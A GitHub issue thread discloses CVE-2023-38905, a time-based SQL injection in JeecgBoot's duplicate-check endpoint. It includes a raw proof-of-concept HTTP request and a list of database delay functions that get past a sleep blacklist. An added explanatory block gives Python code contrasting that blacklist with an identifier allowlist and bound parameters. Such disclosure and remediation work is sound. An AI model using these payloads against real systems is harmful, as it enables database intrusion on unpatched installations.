[CVE-2023-38905] sys/duplicate/check SQL injection #4737

Closed

wealeson1 opened this issue Mar 22, 2023 · 4 comments

Comments


wealeson1 commented Mar 22, 2023

Version:

3.5.0

Frontend version: vue3 or vue2?

vue3

Problem description:

The /sys/duplicate/check endpoint has an SQL injection; checksql can be bypassed.

Screenshots & code:

10-second delay (screenshot).

No delay (screenshot).

Request:
GET /jeecg-boot/sys/duplicate/check?tableName=v3_hello&fieldName=1+and%09if(user(%20)='root@localhost',sleep(0),sleep(0))&fieldVal=1&dataId=asd HTTP/1.1
Host: 127.0.0.1:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
Connection: close
Cache-Control: max-age=0
X_ACCESS_TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NzA2NjUyOTQsInVzZXJuYW1lIjoiYWRtaW4ifQ.bL0e7k3rbFEewdMoL2YfPCo9rtzx7g9KLjB2LK-J9SU


tygithub1 commented Apr 10, 2023

Fixed; a dedicated check for sleep has been added.

healkerzk commented

MySQL uses sleep; other databases may differ, e.g. Oracle has DECODE and DBMS_PIPE.RECEIVE_MESSAGE.

wealeson1 (Author) commented

I have roughly compiled the functions that can cause a delay; please consider handling them:
BENCHMARK
PG_SLEEP
DBMS_LOCK.SLEEP
WAITFOR
DECODE
DBMS_PIPE.RECEIVE_MESSAGE
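The exchange above is about chasing an ever-growing list of time-delay functions with a keyword blacklist. The following is an added example, not code from the JeecgBoot project or from anyone in this thread, showing why that approach keeps losing (a word-boundary check on `sleep` still admits `BENCHMARK`, `WAITFOR` and even `pg_sleep`) and what the usual alternative looks like: `tableName` and `fieldName` are identifiers, so they are validated against a strict identifier pattern and against the live schema, then quoted, while `fieldVal` and `dataId` go through bind parameters. The `duplicate_check` function, the `sys_user` table, the `id` column used for the `dataId` exclusion, the use of SQLite as a stand-in database and the sample payloads are all assumptions constructed for this example.

```python
import re
import sqlite3

# Constructed sample values for the fieldName parameter. The first is in the
# style of the request in the thread (a tab between "and" and "if"); the rest
# use the alternative delay functions listed in the thread.
SAMPLE_FIELD_NAMES = [
    "username",
    "1 and\tif(user()='root@localhost',sleep(10),sleep(0))",
    "1 and benchmark(10000000,sha1('x'))",
    "1 and pg_sleep(10)",
    "1;waitfor delay '0:0:10'--",
]


def naive_keyword_check(value: str) -> bool:
    """Blacklist filter in the spirit of 'a dedicated check for sleep'.
    Returns True if the value is accepted. Note that \\b treats '_' as a word
    character, so 'pg_sleep(' slips through, as do functions not on the list."""
    return re.search(r"\bsleep\s*\(", value, re.IGNORECASE) is None


# Allowlist: what an SQL identifier may look like (assumed limit of 64 chars).
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,63}$")


def safe_identifier(name: str) -> bool:
    """Positive validation: accept only a bare identifier, nothing else."""
    return IDENT_RE.fullmatch(name) is not None


def evaluate_filters() -> dict:
    """For each sample payload, (accepted by blacklist, accepted by allowlist)."""
    return {p: (naive_keyword_check(p), safe_identifier(p)) for p in SAMPLE_FIELD_NAMES}


def build_demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the application database (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sys_user (id TEXT PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO sys_user VALUES (?, ?)",
                     [("u1", "admin"), ("u2", "jeecg")])
    return conn


def duplicate_check(conn, table_name, field_name, field_val, data_id=None) -> int:
    """Hardened duplicate check (hypothetical replacement for the endpoint logic):
    identifiers must match IDENT_RE and exist in the schema, then are quoted;
    the value and the excluded row id are bound as parameters.
    Returns the number of other rows holding the same value."""
    if not (safe_identifier(table_name) and safe_identifier(field_name)):
        raise ValueError("illegal identifier")
    # Schema check: PRAGMA table_info is SQLite's stand-in for information_schema.
    # It returns no rows for an unknown table, which also rejects the table name.
    columns = [row[1] for row in conn.execute(f'PRAGMA table_info("{table_name}")')]
    if field_name not in columns:
        raise ValueError("unknown column")
    sql = f'SELECT COUNT(*) FROM "{table_name}" WHERE "{field_name}" = ?'
    params = [field_val]
    if data_id is not None:
        sql += ' AND "id" <> ?'   # assumed primary-key column name
        params.append(data_id)
    return conn.execute(sql, params).fetchone()[0]


if __name__ == "__main__":
    for payload, (blacklist_ok, allowlist_ok) in evaluate_filters().items():
        print(f"{payload!r}: blacklist accepts={blacklist_ok} allowlist accepts={allowlist_ok}")
    db = build_demo_db()
    print(duplicate_check(db, "sys_user", "username", "admin"))
    print(duplicate_check(db, "sys_user", "username", "admin", data_id="u1"))
```

The point of the allowlist is that the question "is this a column name?" has a finite answer the server already knows, whereas "is this a delay function?" depends on which database sits behind the application and can never be closed. The schema lookup also stops an attacker from probing arbitrary tables through the endpoint.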

wealeson1 changed the title from "sys/duplicate/check SQL injection" to "[CVE-2023-38905] sys/duplicate/check SQL injection" on Aug 18, 2023
zhangdaiscott (Member) commented

Vulnerability fix:
https://my.oschina.net/jeecg/blog/10107636
